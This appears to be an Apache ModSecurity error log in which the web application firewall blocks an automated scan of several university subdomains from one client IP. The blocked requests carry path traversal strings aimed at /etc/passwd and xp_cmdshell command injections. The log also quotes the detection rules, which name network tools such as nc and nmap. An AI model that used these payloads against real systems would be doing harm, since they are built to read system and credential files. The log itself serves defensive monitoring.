[Tue Aug 29 11:45:28.410762 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAdQ30UAAAAV"]
[Tue Aug 29 11:45:28.411880 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAfSWkYAAAAB"]
[Tue Aug 29 11:45:28.415704 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAhrqIsAAAAo"]
[Tue Aug 29 11:45:28.433315 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO136MCo-f0AAAhpwRgAAAAm"]
[Tue Aug 29 11:45:28.437157 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAhT3yQAAAAD"]
[Tue Aug 29 11:45:29.368663 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAgzyUwAAAAF"]
[Tue Aug 29 11:45:29.384444 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAhkLgcAAAAh"]
[Tue Aug 29 11:45:29.385032 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAh3f8EAAAA1"]
[Tue Aug 29 11:45:29.391965 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO136cCo-f0AAAgzyU0AAAAF"]
[Tue Aug 29 11:45:29.407551 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAhrqI4AAAAo"]
[Tue Aug 29 11:45:29.412287 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAhT3ycAAAAD"]
[Tue Aug 29 11:45:29.415234 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136cCo-f0AAAhhcxsAAAAd"]
[Tue Aug 29 11:45:30.372959 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAhxwoIAAAAv"]
[Tue Aug 29 11:45:30.374814 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136sCo-f0AAAgzyVAAAAAF"]
[Tue Aug 29 11:45:30.378645 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAhoHM8AAAAl"]
[Tue Aug 29 11:45:30.384036 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAfiYvoAAAAg"]
[Tue Aug 29 11:45:30.387098 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAhgoIMAAAAb"]
[Tue Aug 29 11:45:30.393328 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAhxwoMAAAAv"]
[Tue Aug 29 11:45:30.415486 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136sCo-f0AAAgzyVIAAAAF"]
[Tue Aug 29 11:45:30.423780 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO136sCo-f0AAAhrqJIAAAAo"]
[Tue Aug 29 11:45:31.352613 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO1368Co-f0AAAhgoIYAAAAb"]
[Tue Aug 29 11:45:31.360581 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO1368Co-f0AAAh13xIAAAAz"]
[Tue Aug 29 11:45:31.370467 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO1368Co-f0AAAhBSA8AAAAX"]
[Tue Aug 29 11:45:31.418062 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO1368Co-f0AAAh4DZsAAAA2"]
[Tue Aug 29 11:45:31.456351 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1368Co-f0AAAhxwogAAAAv"]
[Tue Aug 29 11:45:32.417796 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO137MCo-f0AAAh7wu0AAAA5"]
[Tue Aug 29 11:45:32.427042 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO137MCo-f0AAARphMUAAAAU"]
[Tue Aug 29 11:45:32.544885 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/log/view"] [unique_id "ZO137MCo-f0AAAfSWk4AAAAB"]
[Tue Aug 29 11:45:33.413850 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO137cCo-f0AAAhkLg4AAAAh"]
[Tue Aug 29 11:45:35.125402 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1378Co-f0AAAh7wvAAAAA5"]
[Tue Aug 29 11:45:35.388391 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1378Co-f0AAAhlz6AAAAAi"]
[Tue Aug 29 11:45:35.447649 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAh7wvQAAAA5"]
[Tue Aug 29 11:45:35.452151 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAcsLYEAAAAE"]
[Tue Aug 29 11:45:35.462652 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAh13yEAAAAz"]
[Tue Aug 29 11:45:35.479127 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAhBSB0AAAAX"]
[Tue Aug 29 11:45:35.518823 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAh7wvcAAAA5"]
[Tue Aug 29 11:45:36.443544 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAib5rwAAAAA"]
